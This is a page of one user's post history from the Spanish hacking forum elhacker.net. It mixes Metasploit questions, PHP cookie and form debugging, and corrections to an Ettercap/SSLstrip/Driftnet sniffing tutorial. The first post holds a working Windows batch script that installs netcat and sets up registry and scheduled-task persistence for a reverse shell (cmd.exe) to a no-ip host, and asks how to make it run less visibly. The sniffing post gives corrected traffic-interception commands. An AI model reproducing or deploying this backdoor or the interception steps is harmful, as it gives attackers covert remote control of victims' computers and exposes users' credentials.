elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 13 [14] 15 16 17 18
131  Programación / Scripting / Duda en programacion batch. en: 15 Enero 2010, 02:58 am
Bueno tipico, estoy haciendo un server netcat, que incluye wget para windows, que se instala en C:/Update y se agrega al registro, de hago que se jecute todos los dias a X hora y de ahi que se ejecute C:/Update/nc.exe para que se conecte terminando la instalacion.
Pero cuando se agregan las entradas a las tareas programadas, en lugar de cerrarse se queda la ventana de cmd abierta.
Que puedo hacer para mejorar mi codigo??
Código:
@echo off
mkdir C:\Update
move /Y nc.exe C:/Update
move /Y wget.exe C:/Update
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v Netcat /d "C:\Update\nc.exe server.no-ip.biz 6061 -dte cmd.exe"
AT 11:15p /INTERACTIVE /every:1 ""C:\Update\nc.exe server.no-ip.biz 6061 -dte cmd.exe""
AT 11:15p /INTERACTIVE /every:2 ""C:\Update\nc.exe server.no-ip.biz 6061 -dte cmd.exe""
AT 11:15p /INTERACTIVE /every:3 ""C:\Update\nc.exe server.no-ip.biz 6061 -dte cmd.exe""
AT 11:15p /INTERACTIVE /every:4 ""C:\Update\nc.exe server.no-ip.biz 6061 -dte cmd.exe""
AT 11:15p /INTERACTIVE /every:5 ""C:\Update\nc.exe server.no-ip.biz 6061 -dte cmd.exe""
AT 11:15p /INTERACTIVE /every:6 ""C:\Update\nc.exe server.no-ip.biz 6061 -dte cmd.exe""
AT 11:15p /INTERACTIVE /every:7 ""C:\Update\nc.exe server.no-ip.biz 6061 -dte cmd.exe""
AT 11:15p /INTERACTIVE /every:8 ""C:\Update\nc.exe server.no-ip.biz 6061 -dte cmd.exe""
AT 11:15p /INTERACTIVE /every:9 ""C:\Update\nc.exe server.no-ip.biz 6061 -dte cmd.exe""
AT 11:15p /INTERACTIVE /every:10 ""C:\Update\nc.exe server.no-ip.biz 6061 -dte cmd.exe""
AT 11:15p /INTERACTIVE /every:11 ""C:\Update\nc.exe server.no-ip.biz 6061 -dte cmd.exe""
AT 11:15p /INTERACTIVE /every:12 ""C:\Update\nc.exe server.no-ip.biz 6061 -dte cmd.exe""
AT 11:15p /INTERACTIVE /every:13 ""C:\Update\nc.exe server.no-ip.biz 6061 -dte cmd.exe""
AT 11:15p /INTERACTIVE /every:14 ""C:\Update\nc.exe server.no-ip.biz 6061 -dte cmd.exe""
AT 11:15p /INTERACTIVE /every:15 ""C:\Update\nc.exe server.no-ip.biz 6061 -dte cmd.exe""
AT 11:15p /INTERACTIVE /every:16 ""C:\Update\nc.exe server.no-ip.biz 6061 -dte cmd.exe""
AT 11:15p /INTERACTIVE /every:17 ""C:\Update\nc.exe server.no-ip.biz 6061 -dte cmd.exe""
AT 11:15p /INTERACTIVE /every:18 ""C:\Update\nc.exe server.no-ip.biz 6061 -dte cmd.exe""
AT 11:15p /INTERACTIVE /every:19 ""C:\Update\nc.exe server.no-ip.biz 6061 -dte cmd.exe""
AT 11:15p /INTERACTIVE /every:20 ""C:\Update\nc.exe server.no-ip.biz 6061 -dte cmd.exe""
AT 11:15p /INTERACTIVE /every:21 ""C:\Update\nc.exe server.no-ip.biz 6061 -dte cmd.exe""
AT 11:15p /INTERACTIVE /every:22 ""C:\Update\nc.exe server.no-ip.biz 6061 -dte cmd.exe""
AT 11:15p /INTERACTIVE /every:23 ""C:\Update\nc.exe server.no-ip.biz 6061 -dte cmd.exe""
AT 11:15p /INTERACTIVE /every:24 ""C:\Update\nc.exe server.no-ip.biz 6061 -dte cmd.exe""
AT 11:15p /INTERACTIVE /every:25 ""C:\Update\nc.exe server.no-ip.biz 6061 -dte cmd.exe""
AT 11:15p /INTERACTIVE /every:26 ""C:\Update\nc.exe server.no-ip.biz 6061 -dte cmd.exe""
AT 11:15p /INTERACTIVE /every:27 ""C:\Update\nc.exe server.no-ip.biz 6061 -dte cmd.exe""
AT 11:15p /INTERACTIVE /every:28 ""C:\Update\nc.exe server.no-ip.biz 6061 -dte cmd.exe""
AT 11:15p /INTERACTIVE /every:29 ""C:\Update\nc.exe server.no-ip.biz 6061 -dte cmd.exe""
AT 11:15p /INTERACTIVE /every:30 ""C:\Update\nc.exe server.no-ip.biz 6061 -dte cmd.exe""
start /B "C:\Update\nc.exe server.no-ip.biz 6061 -dte cmd.exe"
exit

Muchas Gracias.
132  Seguridad Informática / Hacking / Re: Hay algun manual completo de Metasploit que me puedan facilitar? en: 14 Enero 2010, 04:32 am
Vale tio, muchas gracias.
Que bueno que se ingles xD :D
133  Seguridad Informática / Hacking / Hay algun manual completo de Metasploit que me puedan facilitar? en: 14 Enero 2010, 01:36 am
Porfavor, hay muhco tutoriales muy completos de metasploit, pero quisiera saber si hay por ahi un Manual que sea completisisisisimo de Metasploit, para entender todas sus funciones al 100%.

Se los agradeceria mucho.
Muchas Gracias.
134  Seguridad Informática / Hacking / Re: Conseguir Shell con Netcat en: 13 Enero 2010, 03:54 am
Está muy bien , pero este tutorial es la copia , de la copia de otra copia de algún tutorial sobre netcat :).
Al margen del tutorial de GNUtizien de netcat casi todos los tutoriales son iguales o plagiados.
[EDITO]: Y "192.168.1.33" no tiene por qué necesariamente ser nuestra ip local , con lo que aquí si que se que es una copia , no?

//+1
135  Seguridad Informática / Hacking / Re: Metasploit; Como lo inicio? (SOLUCIONADO) en: 13 Enero 2010, 03:43 am
Muchas gracias, solo le falto ./
Código:
./msfconsole

Tienes que hacer un 'cd' a donde esta guardado el metasploit, en mi caso /opt/MSF/trunk
Y entonces se ejecuta el ./msfconsole

Bueno, esto lo escribo para quien no sepa.
Muchas Gracias.
Saludos
136  Seguridad Informática / Hacking / [?] Metasploit; Como lo inicio? (Solucionado) en: 13 Enero 2010, 01:52 am
Buenas! !

Bueno que apenas tengo el metasploit y estoy por aprender a usarlo, pero, no se como iniciarlo desde terminal..
Me podrian ayudar con eso porfavor?
haha
se que si saben xD
137  Seguridad Informática / Hacking / Re: Descargar archivo desde CMD en: 12 Enero 2010, 19:06 pm
que buen post xD
138  Seguridad Informática / Hacking / Re: HOW TO: Sniffing en Linux (Ettercap+SSLstrip+Driftnet) en: 9 Enero 2010, 00:19 am
Hay un error en:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 44444
debe hacerse como root y para iptables seria "iptables --t"

Código:
sudo iptables --t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 44444

Modifico: Hay tambien otro error en la ultima linea del Paso 2:

Código:
bsdkiller@bsdkiller:/usr/bin/sslstrip-0.7$ sudo python sslstrip -l 10000
/usr/bin/python: can't find '__main__.py' in 'sslstrip'
SOLUCION: Solamente es necesario hacer un "ls" dentro de la carpeta de SSLstrip (Gracias, Braulio) y despues un "CAT sslstrip.py" para que se lea el archivo y despues volver a ejecutar "sudo python sslstrip -l 10000"
Código:
bsdkiller@bsdkiller:/usr/bin/sslstrip-0.7$ sudo python sslstrip.py -l 10000

sslstrip 0.6 by Moxie Marlinspike running...

Y hay otro error con Driftnet:

Código:
bsdkiller@bsdkiller:~$ sudo driftnet -i eth1
[sudo] password for bsdkiller:
libpng error: Invalid image width (skipping image).
driftnet: driftnet-4b47c2f274b0dc51.png: bogus image (err = 4)
libpng error: Invalid image width (skipping image).
driftnet: driftnet-4b47c2f2238e1f29.png: bogus image (err = 4)
libpng error: Invalid image width (skipping image).
driftnet: driftnet-4b47c304519b500d.png: bogus image (err = 4)
libpng error: Invalid image width (skipping image).
driftnet: driftnet-4b47c30a257130a3.png: bogus image (err = 4)

Por cierto, creo que hay un fallo en la orden de redirigir el puerto 80 al 44444, deberian redirigirse al puerto 10000 (que es el puerto de escucha por defecto de sslstrip), o indicarle a sslstrip que escuche en el 44444.
Edito: una pregunta. ¿Se podría en ettercap indicar más de una ip victima a la vez, por ejemplo 5 ip's, y hacerlo de manera "multiple"?¿sería viable?.
Ya que no dispongo de 3 pc's para probarlo me gustaria saberlo.

Me gustaria que el autor diera mas informacion acerca de la cita que hago de jorgebr.

Y jorgebr, yo tengo mas de 5 :D Asi que lo puedo probar por tu, que dices? nos unimos ?
139  Programación / PHP / Re: Ayuda con cookies please xD en: 29 Octubre 2009, 01:51 am
Muchas Gracias por las respuestas anteriores.
:d
Para no publicar otro tema, voy a describir un problema que tengo con setcookie, este problema es reciente.

Tengo un dominio: ejemplo.ex.net y un subdominio bla.ejemplo.ex.net

A=ejemplo.ex.net
B=bla.ejemplo.ex.net

Cuando el usuario entra a A y tiene la cookie "AboutVisit" es redirigido al index.
Si no tiene cookie "AboutVisit" se dirige a antiddos.php, que pide un captcha y si es true te dirije al index, si no, te saca del sitio.
El index de A revisa si tienes cookie tambien, si no la tienes, antiddos.php.

Código:
antiddos.php@A

<?php
} else { //form is posted
  include("securimage.php");
  $img = new Securimage();
  $valid = $img->check($_POST['code']);
  $Month = 2592000 + time();
  if($valid == true) {
//Inserta cookie por 30 dias.
setcookie(AboutVisit, date("F jS - g:i a"), $Month);
     echo "Muchas Gracias.";
header("Location: index.php");
  } else {
     header("Location: http://ejemplo.ex.net-a.googlepages.com/");
  }
}

?>

Hasta aqui esto funciona perfectamente.

Cuando el usuario entra a B y tiene la cookie "mkmnstrCookie", deberia entrar a hell.php (un login).
Si no hay cookie "mkmnstrCookie" te lleba a antiddos.php
Pero, como (creo yo) que la cookie no se guarda, hell.php me redirige a antiddos.php.
Código:
antiddos.php@B

<?php
} else { //form is posted
  include("securimage.php");
  $img = new Securimage();
  $valid = $img->check($_POST['code']);
  $Month = 2592000 + time();
  if($valid == true) {
//Inserta cookie por 30 dias.
setcookie(mkmnstrCookie, date("F jS - g:i a"), $Month);
     echo "Muchas Gracias.";
header("Location: ../hell.php");
  } else {
     header("Location: http://bla.ejemplo.ex.net-a.googlepages.com/");
  }
}

?>


Este es el de hell.php
Código:
hell.php@B


<?php
if(!isset($_COOKIE['mkmnstrCookie']))
{
header("Location: anti/antiddos.php");
}
?>

Yo en realidad no veo cual es el problema.
Si ustedes lo ven o saben, porfavor, ayuda.
Saludos y muchas gracias

NOTA:  B en mi servidor esta guardado como ejemplo.ex.net/bla/ == bla.ejemplo.ex.net .
140  Programación / PHP / Ayuda con formulario y PHP en: 28 Octubre 2009, 03:01 am
Buenas !

Tengo hecho un formulario, de una encuesta, y segun como lo programe debe saltar si un campo no esta lleno, pero no lo hace, les dejo el codigo completo porque tengo un script que deshabilita el boton de enviar al presionar para evitar spam..

Este es el que deshabilita el boton.
Código:
</style>
<script language="javascript" type="text/javascript">
autoDetect = true;
timeOutSecs = 5; // luego de 5 segundos, el botón se habilitará de nuevo,
// para el caso de que el servidor deje de responder y el usuario
// necesite volver a submitir.
window.onload = init; // esta linea puede borrarse si autoDetect=false
function init(e){
if (autoDetect){
for (var a=0;a<document.forms.length;a++){
document.forms[a].onsubmit = disable; // adjunta la función disable a todos los forms
}
}
}
function disable(e){ // asigna función al submit y pasa el evento como argumento
if (document.getElementById) { // chekea que el navegador soporte. Sino lo hace, se ignora el efecto.
if (autoDetect){ // toma el objeto FORM desde el evento
if (!e) {e = document.parentWindow.event;} // mozilla pasa (e) pero IE no, así que también usamos su forma de obtener el evento
var el = e.target || e.srcElement; // obtener el elemento de donde salió el evento, para mozilla o explorer
} else { // toma el objeto FORM si se pasa manualmente
el = e;
}
while (el.tagName != "FORM"){ el = el.parentNode;} // mozilla pasa el input como source del submit. busco entonces el form de ese input.
for (var b=0;b<el.elements.length;b++){ // por cada elemento del form
var formEl = el.elements[b];
// si el elemento es un botón de submit
if ((formEl.tagName == "INPUT") && (formEl.getAttribute("type") != null) && ((formEl.getAttribute("type").toLowerCase() == "submit") )) {
formEl.disabled = true; // desactivar botón
document.getElementsByTagName("body")[0].style.cursor = 'wait'; // relojito
setTimeout(function(){formEl.disabled = false;document.body.style.cursor = 'default';},timeOutSecs*1000)
}
}
}
return true;
}
//-->
</script>

Este es el code del form:
Código:
<form id="form1" name="form1" method="post" action="send_form.php">
            <p align="left">¿Qué piensas al leer enconstruccion.com?<br />
              <span id="sprytextfield1">
                <label>
                  <textarea name="first" cols="40" id="first"></textarea>
                  <br />
                </label>
                <span class="textfieldRequiredMsg">Se necesita un valor.</span></span> <br />
              Te gusta el nombre enconstruccion.com para un sito web?<br />
  <span id="spryradio1">
  <label>
    <input type="radio" name="second" value="Si" id="second_0" />
    Si, si me gusta.</label>
  <br />
  <label>
    <input type="radio" name="second" value="No" id="second_1" />
    No, no me gusta.</label>
  <br />
  <span class="radioRequiredMsg">Realice una selección.</span></span> </p>
            <p align="left">¿De que crees que tratara este sitio?<br />
              <span id="sprytextfield2">
                <label>
                  <textarea name="third" cols="40" id="third"></textarea>
                </label>
                <span class="textfieldRequiredMsg">Se necesita un valor.</span></span> </p>
            <p align="left">¿Qué te gustaria encontrar en este sitio?<br />
              <span id="sprytextfield3">
                <label>
                  <textarea name="forth" cols="40" id="forth"></textarea>
                </label>
                <span class="textfieldRequiredMsg">Se necesita un valor.</span></span><br />
            </p>
          <p align="left"><span id="sprytextfield4">
              <label>
                <input name="fifth" type="text" class="IpTxt" id="fifth" value='<? $ip=$_SERVER['REMOTE_ADDR']; echo "$ip"; ?>' readonly="readonly" hidden="" />
              </label>
            <span class="textfieldRequiredMsg">Se necesita un valor.</span></span> <br />
            [<span class="txtt">Tu IP es enviada solo como medida de seguridad.</span>] <br />
            </p>
            <p align="left">
<?
    $strCodigo="";
for($iCont=1;$iCont<=5;$iCont++){
$strCodigo=$strCodigo.rand(1,9);
}
echo "Introduce el siguiente Código: ";
echo $strCodigo;
echo " <br> \n";
?>
<input type="text" name="escrito" width=50 size=5 ">
<INPUT TYPE="hidden" NAME="puesto" VALUE="<? echo $strCodigo ?>" width=100 size=20 "><BR>
</p>
            <p align="left">
              <label>
                <input type="submit" onkeypress="disabled" name="sEND" id="sEND" value="Enviar" />
              </label>
              <label>
                <input type="reset" name="rESTA" id="rESTA" value="Restablecer" />
              </label>
            </p>
          </form>


Y este es el ultimo script antes de </body>:
Código:
<script type="text/javascript">
<!--
var sprytextfield1 = new Spry.Widget.ValidationTextField("sprytextfield1");
var spryradio1 = new Spry.Widget.ValidationRadio("spryradio1");
var sprytextfield2 = new Spry.Widget.ValidationTextField("sprytextfield2");
var sprytextfield3 = new Spry.Widget.ValidationTextField("sprytextfield3");
var sprytextfield4 = new Spry.Widget.ValidationTextField("sprytextfield4");
//-->
</script>

Igual he puesto datos demas, pero se que hay veces que una pequeña coma aveces puede significar la diferencia.
Muchas Gracias de antemano para el que me pueda ayudar...
Tambien si ven algo mas que esta mal, ayudenme porfavor.
Cuidence
xD
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 13 [14] 15 16 17 18
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines